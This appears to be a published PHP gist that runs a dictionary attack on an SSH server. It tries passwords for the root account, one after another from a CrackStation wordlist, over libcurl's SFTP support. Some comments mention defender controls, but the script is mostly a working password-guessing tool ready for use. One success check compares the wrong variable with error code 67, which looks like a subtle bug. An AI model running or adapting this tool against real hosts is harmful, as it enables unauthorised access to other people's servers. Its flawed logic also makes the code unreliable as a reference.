Created
June 14, 2019 15:50
dictionary attack on ssh server..
<?php
// Password-guessing script: it drives libcurl's SFTP support against one SSH
// service, taking candidate passwords from a gzip-compressed wordlist.
// Defender's view: the server sees a run of password authentications for
// "root" from a single source. Key-only authentication, PermitRootLogin no,
// MaxAuthTries and rate limiting of repeated failures are the usual controls.
declare (strict_types = 1);
// Gzip-compressed wordlist; the readers below open it with gzopen() and
// report getcwd() in the error they raise when opening fails.
const CRACKSTATION_FILENAME = "crackstation.txt.gz";
// Host part of the sftp:// URL built below; empty in the published copy.
const TARGET_IP='';
// init() is defined further down: PHP version check, then loads hhb_.inc.php
// (not shown on this page) and calls hhb_init().
init();
// Disabled benchmark harness: it called each of the two wordlist readers
// 10,000,000 times, selected by a command-line argument.
// if ($argc !== 2) {
// die("{$argv[0]} X (method)\n");
// }
// $method = $argv[1];
// if ($method === "1") {
// echo "using custom-optimized gzread() loop...\n";
// for ($i = 0; $i < 10000000; ++$i) {
// $v=0.0;
// var_dump(get_next_password_custom_optimized($v),$v);
// }
// } elseif ($method === "2") {
// echo "using gzgets() loop...\n";
// for ($i = 0; $i < 10000000; ++$i) {
// var_dump(get_next_password_simple());
// }
// } else {
// die("ERROR: UNKNOWN METHOD!\n");
// }
// One curl handle is configured here and reused for every attempt.
$ch = curl_init();
curl_setopt_array($ch, array(
//CURLOPT_VERBOSE=>1,
// SFTP transfer of /dev/null: only the login result is of interest.
CURLOPT_URL => 'sftp://'.TARGET_IP.':/dev/null',
// Placeholder credentials; the loop below overwrites CURLOPT_USERPWD
// before each curl_exec().
CURLOPT_USERPWD => 'root:ddd',
// Restrict libcurl to SSH password authentication.
CURLOPT_SSH_AUTH_TYPES => CURLSSH_AUTH_PASSWORD,
// NOTE(review): the three options below are TLS certificate settings.
// libcurl configures SSH host-key checking through separate CURLOPT_SSH_*
// options, so these presumably have no effect on an sftp:// URL. Confirm.
CURLOPT_SSL_VERIFYHOST => 0,
CURLOPT_SSL_VERIFYPEER => 0,
CURLOPT_SSL_VERIFYSTATUS => 0,
// 10 s to connect, 15 s for the whole transfer.
CURLOPT_CONNECTTIMEOUT=>10,
CURLOPT_TIMEOUT=>15,
));
// Attempt loop. It reuses the curl handle $ch configured above and prints
// every candidate to stdout before trying it.
$attempts = 0;
// Progress value filled in by reference by get_next_password_simple().
$percent = -1;
$exceptional = false;
// No break statement: the loop only ends through die(), either below or
// inside get_next_password_simple() once the wordlist is exhausted.
for (;;) {
++$attempts;
$pass = get_next_password_simple($percent);
echo "attempts: {$attempts} percent: ".number_format($percent,10)." - trying \"{$pass}\"..";
curl_setopt($ch,CURLOPT_USERPWD, 'root:'.$pass);
// Each curl_exec() is one authentication attempt that the server can log
// and rate-limit.
$cret = curl_exec($ch);
echo ".";
if ($cret !== false) {
echo "\n";
echo "EXCEPTIONAL - CURL_EXEC DID NOT RETURN BOOL(FALSE) !!\n";
hhb_var_dump($cret);
$exceptional = true;
}
$errno = curl_errno($ch);
// 67 is libcurl's CURLE_LOGIN_DENIED (the server rejected the login).
if ($cret !== 67) {
echo "\n";
echo "EXCEPTIONAL - CURL_ERRNO WAS NOT 67!!\n";
hhb_var_dump($errno);
$exceptional = true;
}
if ($exceptional) {
// The dump calls curl_exec() a second time, which repeats the login with
// the same credentials before the script exits.
hhb_var_dump($pass, curl_exec($ch), curl_errno($ch), curl_error($ch), curl_strerror(curl_errno($ch)));
die("SUCCESS? EXITING\n");
}
echo "nope.\n";
}
// Not reached: the loop above has no break.
echo ":( FAILED\n";
/**
 * Start-up checks: stop on PHP older than 7.1.0, then load the hhb_ helper
 * library from hhb_.inc.php (not part of this page) and initialise it.
 */
function init()
{
    $tooOld = version_compare(PHP_VERSION, '7.1.0', '<');
    if ($tooOld) {
        die("error: script requires PHP >= 7.1.0");
    }

    require_once 'hhb_.inc.php';
    hhb_init();
}
/**
 * Return the next non-empty line of the gzip wordlist, one gzgets() call at a time.
 *
 * The file handle and end-of-file flag live in static variables, so the
 * wordlist is opened once on the first call and read sequentially afterwards.
 * Lines that are empty after stripping CR/LF are skipped by recursing.
 * Because empty() is used for that test, a line consisting of "0" is skipped too.
 *
 * @param float|null $percent Progress indicator, written by reference when not
 *                            null: gztell() position divided by filesize() of
 *                            the wordlist, times 100. filesize() is the on-disk
 *                            (compressed) size while gztell() counts
 *                            uncompressed bytes, so the value is only a rough guide.
 *
 * @return string The candidate with trailing "\r" / "\n" removed.
 *
 * @throws \RuntimeException When the wordlist cannot be opened.
 */
function get_next_password_simple(float &$percent = null): string
{
    static $opened = false;
    static $exhausted = false;
    static $handle = null;
    static $sizeOnDisk = -1;

    // Lazy one-time open on the first call.
    if (!$opened) {
        $handle = gzopen(CRACKSTATION_FILENAME, "rb");
        if (!$handle) {
            throw new \RuntimeException("failed to open CRACKSTATION file \"" . CRACKSTATION_FILENAME . "\"! cwd: \"" . getcwd() . "\"");
        }
        $sizeOnDisk = filesize(CRACKSTATION_FILENAME);
        $opened = true;
    }

    // A previous call ran out of data: release the handle and end the script.
    if ($exhausted) {
        if ($handle) {
            gzclose($handle);
            $handle = null;
        }
        die("LAST PASSWORD TRIED!");
    }

    $line = gzgets($handle);
    if (empty($line)) {
        // Nothing came back; remember it so the next call terminates.
        $exhausted = true;
    }

    $candidate = rtrim($line, "\r\n");
    if (empty($candidate)) {
        // Blank line (or end of data): move on to the next one.
        return get_next_password_simple($percent);
    }

    if ($percent !== null) {
        $percent = (gztell($handle) / $sizeOnDisk) * 100;
    }

    return $candidate;
}
/**
 * Return the next wordlist line using bulk gzread() calls instead of gzgets().
 *
 * Up to 10 MiB is read at a time and then extended byte by byte until it ends
 * on a newline, so no line is split across two chunks. The chunk is exploded
 * into a static buffer and served with array_pop(), which means lines inside
 * one chunk come back last-to-first.
 *
 * @param float|null $percent Accepted for signature parity with
 *                            get_next_password_simple(); this function never
 *                            writes to it.
 *
 * @return string|null The next line with trailing "\r" / "\n" removed, or null
 *                     once the file is exhausted and the buffer is empty.
 *
 * @throws \RuntimeException When the wordlist cannot be opened or gzread()
 *                           does not return a string.
 */
function get_next_password_custom_optimized(float &$percent = null): ?string
{
    static $opened = false;
    static $handle = null;
    static $pending = [];
    static $exhausted = false;
    static $sizeOnDisk = -1; // stored at open time, not used afterwards

    // Lazy one-time open on the first call.
    if (!$opened) {
        $handle = gzopen(CRACKSTATION_FILENAME, "rb");
        if (!$handle) {
            throw new \RuntimeException("failed to open CRACKSTATION file \"" . CRACKSTATION_FILENAME . "\"! cwd: \"" . getcwd() . "\"");
        }
        $sizeOnDisk = filesize(CRACKSTATION_FILENAME);
        $opened = true;
    }

    if (empty($pending)) {
        if ($exhausted) {
            // Nothing buffered and nothing left to read: release the handle.
            if ($handle) {
                gzclose($handle);
                $handle = null;
            }
            return null;
        }

        // Refill: pull up to 10 MiB of decompressed data.
        $remaining = 10 * 1024 * 1024;
        $chunk = "";
        while ($remaining > 0) {
            $piece = gzread($handle, $remaining);
            if (!is_string($piece)) {
                throw new \RuntimeException("gzread error!");
            }
            $pieceLength = strlen($piece);
            if ($pieceLength < 1) {
                // A zero-length read is treated as end of file.
                $exhausted = true;
                break;
            }
            $remaining -= $pieceLength;
            $chunk .= $piece;
        }

        // Finish the partial last line so the chunk ends on a line boundary.
        if (!$exhausted) {
            while (substr($chunk, -1) !== "\n") {
                $byte = gzgetc($handle);
                if (false === $byte || strlen($byte) !== 1) {
                    $exhausted = true;
                    break;
                }
                $chunk .= $byte;
            }
        }

        $pending = explode("\n", rtrim($chunk, "\n"));
    }

    return rtrim(array_pop($pending), "\r\n");
}